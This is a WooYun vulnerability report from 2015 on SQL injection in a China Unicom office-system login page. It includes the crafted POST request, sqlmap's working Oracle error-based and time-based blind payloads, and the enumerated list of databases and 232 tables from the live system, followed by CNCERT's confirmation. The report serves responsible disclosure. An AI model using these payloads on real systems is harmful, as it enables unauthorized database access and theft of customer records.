运营商安全之中国联通网络办公系统SQL注入

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146087

漏洞标题：运营商安全之中国联通网络办公系统SQL注入

漏洞作者：路人甲

提交时间：2015-10-14 14:18

修复时间：2015-12-02 22:38

公开时间：2015-12-02 22:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-14：细节已通知厂商并且等待厂商处理中
2015-10-18：厂商已经确认，细节仅向厂商公开
2015-10-28：细节向核心白帽子及相关领域专家公开
2015-11-07：细节向普通白帽子公开
2015-11-17：细节向实习白帽子公开
2015-12-02：细节向公众公开

简要描述：

详细说明：

POST /guanli/app/login.asp?action=login HTTP/1.1
Host: **.**.**.**:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8080/guanli/app/login.asp
Cookie: ASPSESSIONIDQQCSQBCR=KEPBHCDBMJDHKIBLDGJNHCED
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
user_name=123'&txtuserpwd=123&cmdfun=%B5%C7%C2%BD

参数:user_name

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: user_name=123' AND 9700=CTXSYS.DRITHSX.SN(9700,(CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9700=9700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113)))-- nrrl&txtuserpwd=123&cmdfun=%B5%C7%C2%BD
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: user_name=123' AND 3759=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- syfd&txtuserpwd=123&cmdfun=%B5%C7%C2%BD
---
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Oracle
current schema (equivalent to database on Oracle):    'JT'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: user_name=123' AND 9700=CTXSYS.DRITHSX.SN(9700,(CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9700=9700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113)))-- nrrl&txtuserpwd=123&cmdfun=%B5%C7%C2%BD
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: user_name=123' AND 3759=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- syfd&txtuserpwd=123&cmdfun=%B5%C7%C2%BD
---
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Oracle
available databases [40]:
[*] ACT3
[*] APEX_030200
[*] APPQOSSYS
[*] BIS
[*] CAOJP1
[*] CEN
[*] CHENZHENG8
[*] CRM3
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] GRID
[*] JT
[*] LIHT32
[*] LINING101
[*] MDSYS
[*] MENGDC1
[*] NIUXD1
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] QINPENG2
[*] REGN
[*] REPORT
[*] SCOTT
[*] SHIYW11
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TANGCG1
[*] UN_LIKE
[*] WANGFANG71
[*] WMSYS
[*] XDB
[*] YANGLI44
[*] ZHAOLJ36
[*] ZHOUMM

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: user_name=123' AND 9700=CTXSYS.DRITHSX.SN(9700,(CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9700=9700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113)))-- nrrl&txtuserpwd=123&cmdfun=%B5%C7%C2%BD
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: user_name=123' AND 3759=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- syfd&txtuserpwd=123&cmdfun=%B5%C7%C2%BD
---
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Oracle
Database: JT
[232 tables]
+-------------------------------+
| ACCESSLOG                     |
| ACCT_DIS                      |
| ACCT_ONE_USER                 |
| ACC_DIS                       |
| ACTIVITIES_LIST               |
| ACTIVITIES_TEAM               |
| ACTIVITIES_TYPE               |
| ASSESSMENT_SANWU              |
| BM                            |
| BROADBAND_DEDICATED_LINE      |
| BTBW_2014                     |
| BTBW_2014_SJ                  |
| BULLETIN                      |
| CLUSTER_MARKET_ACTIVITY       |
| CLUSTER_MARKET_ADDRESS        |
| CLUSTER_MARKET_F_CBSS         |
| DAILY_TV_LIST                 |
| DATA                          |
| DCHNDEVICE                    |
| DEDICATED_LINE                |
| DEDICATED_LINE_CONVERT        |
| DEL_1                         |
| DEL_20                        |
| DEL_3                         |
| DEL_4                         |
| DESTROY_3G_201401_06          |
| DISPATCH_PRODUCT              |
| EXCEL_IMPORT                  |
| FUSION                        |
| FUSION_USER                   |
| FZDD_YYX                      |
| F_M_MOBILE_LIST               |
| F_M_SUBSIDY                   |
| F_M_SUBSIDY_201506            |
| GAIZHI_RH                     |
| GROUP_4G                      |
| GZQD                          |
| GZQD_20150528                 |
| GZ_CHANGE_REMARK              |
| GZ_RESOURCES_SITUATION        |
| HDPH_3GFZL                    |
| HDPH_JH                       |
| HDPH_JH_2013_1JD              |
| HDPH_YWLB                     |
| HMQD                          |
| HMQD_20150528                 |
| IMEI                          |
| INDUSTRY_AGENT                |
| INTMP                         |
| IP                            |
| JBDA                          |
| JBDA_FZBM                     |
| JBDA_FZBM_YYX                 |
| JBDA_ZW                       |
| JF_DLK                        |
| JF_DLK_2014                   |
| JF_JWT                        |
| JF_XLLK                       |
| JF_YSQD                       |
| JF_ZSHQD                      |
| JINING_HBY                    |
| JINING_HBYBAK                 |
| JKZX3G                        |
| JKZX3GQF                      |
| JURISDICTION                  |
| KHGL_LNLC                     |
| KHGL_YWXX                     |
| KHQD                          |
| KHQD_20140113                 |
| KHQD_20140227                 |
| KHQD_20140429                 |
| KHQD_20140520                 |
| KHQD_20140524                 |
| KHQD_20140616                 |
| KHQD_ACCOUNT_ID               |
| KHQD_ACCOUNT_ID_20140312      |
| KHQD_ACCOUNT_ID_20140428      |
| KHQD_ACCOUNT_ID_20140524      |
| KHQD_ACCOUNT_ID_BAK           |
| KHQD_ADJUST_LOG               |
| KHQD_HYDLK                    |
| KHQD_SERVICESTATE             |
| LEDGER                        |
| LINE_NUM                      |
| LINQING_QF                    |
| LSAJIE_JTKHZGID               |
| LSAJIE_TEMP                   |
| LTZWQD                        |
| MAINTAIN_INFO                 |
| MAINTAIN_USER                 |
| MAINTAIN_USER_4G              |
| NET_TYPE                      |
| NOTES                         |
| NUMCHANGE                     |
| ODBC_IMPORT                   |
| PHONE1                        |
| PON_JT_21                     |
| PON_TMP                       |
| PON_TMP1                      |
| PON_TMP_21                    |
| PRODUCT_VALUE                 |
| PROTOCOL_PAYMENT              |
| PU_NAMES                      |
| QFQD                          |
| QFQD_201310                   |
| QFQD_ACCOUNT_ID               |
| QFQD_RECOVER                  |
| REAL_NAME                     |
| REGIONBUILDINGPORT07          |
| REPORT_TRADE_IPTV             |
| RSS_REGIONBUILDINGPORT07      |
| RT_ADDRESS_INFO07             |
| SRBB_201302_XFZ               |
| SRBB_201303                   |
| SRBB_201303_XFZ               |
| SRBB_201304                   |
| SRBB_201304_XFZ               |
| SRBB_201305                   |
| SRBB_201305_XFZ               |
| SRBB_201306                   |
| SRBB_201306_XFZ               |
| SRBB_201307                   |
| SRBB_201307_XFZ               |
| SRBB_201308                   |
| SRBB_201308_XFZ               |
| SRBB_201309                   |
| SRBB_201309_XFZ               |
| SRBB_201310                   |
| SRBB_201310_XFZ               |
| SRBB_201311                   |
| SRBB_201311_XFZ               |
| SRBB_201312                   |
| SRBB_201312_XFZ               |
| SRBB_201401                   |
| SRBB_201401_XFZ               |
| SRBB_201402                   |
| SRBB_201402_XFZ               |
| SRBB_201403                   |
| SRBB_201403_XFZ               |
| SRBB_201404                   |
| SRBB_201404_XFZ               |
| SRBB_201405                   |
| SRBB_201405_XFZ               |
| SRBB_201406                   |
| SRBB_201406_XFZ               |
| SRBB_201407                   |
| SRBB_201407_XFZ               |
| SRBB_201408                   |
| SRBB_201409_XFZ               |
| SRBB_201410                   |
| SRBB_201410_XFZ               |
| SRBB_201411_XFZ               |
| SRBB_201412                   |
| SRBB_201502                   |
| SRBB_201503                   |
| SRBB_201507                   |
| SRBB_201509                   |
| SRBB_BUMEN                    |
| SRBB_BUMEN_ACCOUNT_ID         |
| SRBB_BUMEN_ELIMINATE_MAINTAIN |
| SRBB_DANWEI                   |
| SRBB_DANWEI_ACCOUNT_ID        |
| SRBB_KHJL                     |
| SRBB_KHJL_ACCOUNT_ID          |
| SYSTEM_BINDING                |
| SYSTEM_CODE_STATIC            |
| TEMP_ACCOUNT_ID               |
| TEMP_CUST                     |
| TEMP_CUST1                    |
| TEMP_DWDB                     |
| TEMP_DWDBQF                   |
| TEMP_JIHONGYING_VPN           |
| TEMP_LIRUHUI                  |
| TF_BH_TRADE                   |
| TF_F_RELATION_GROUP           |
| TF_F_RELATION_UU              |
| TMP_DBQF                      |
| TMP_HMQD                      |
| TMP_HTH                       |
| TMP_YF                        |
| TMP_YF_CBSS                   |
| TM_DEVELOP                    |
| TM_KEEP_201312                |
| TM_KEEP_201412                |
| TM_USER                       |
| TM_USER_2013                  |
| TM_USER_CUST                  |
| TM_USER_ITEM                  |
| TM_USER_KHQD                  |
| TM_USER_T_HEYUE               |
| T_1                           |
| T_2                           |
| T_HEYUE                       |
| T_HEYUE_201508                |
| T_HEYUE_20150818              |
| T_HEYUE_4G                    |
| T_HEYUE_CUNLIANG              |
| T_HEYUE_DANWEI                |
| T_HEYUE_DWDB                  |
| T_HEYUE_DWDB_QFDD             |
| T_HEYUE_DWDB_QTDD             |
| T_HEYUE_DWDB_SGS              |
| T_HEYUE_DWDB_SGS1             |
| T_HEYUE_GLHT                  |
| T_HEYUE_QFQD                  |
| T_HEYUE_QFQD_20131130         |
| T_HEYUE_QFQD_20140305         |
| T_HEYUE_SGS                   |
| T_HEYUE_SHOURU_201310         |
| T_HEYUE_SHOURU_201311         |
| T_HEYUE_SHOURU_201312         |
| T_HEYUE_SHOURU_201401         |
| T_HEYUE_SHOURU_201402         |
| T_HEYUE_SHOURU_201403         |
| T_HEYUE_ZDDD                  |
| UPDATE_M_T_ACCOUNT_ID         |
| USER_ID                       |
| USER_SCALE                    |
| VPN_USER_MOBILE               |
| WHT_DWDB                      |
| WHT_DWDB_20140703             |
| WUYONGHENG_3G                 |
| WYH_GWLS                      |
| WYH_GWLW                      |
| XLTZWMBQD                     |
| XLTZWMBQD_BB                  |
| XZQH                          |
| ZDGL_COLOR                    |
| ZDGL_IN                       |
| ZDGL_SORT                     |
| ZDGL_XH                       |
| ZDGL_YSJ                      |
+-------------------------------+

表太多，之跑了一部分。

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-10-18 22:37

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146087

漏洞标题：运营商安全之中国联通网络办公系统SQL注入

相关厂商：中国联通

漏洞作者：路人甲

提交时间：2015-10-14 14:18

修复时间：2015-12-02 22:38

公开时间：2015-12-02 22:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146087

漏洞标题：运营商安全之中国联通网络办公系统SQL注入

相关厂商：中国联通

漏洞作者： 路人甲

提交时间：2015-10-14 14:18

修复时间：2015-12-02 22:38

公开时间：2015-12-02 22:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0146087"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云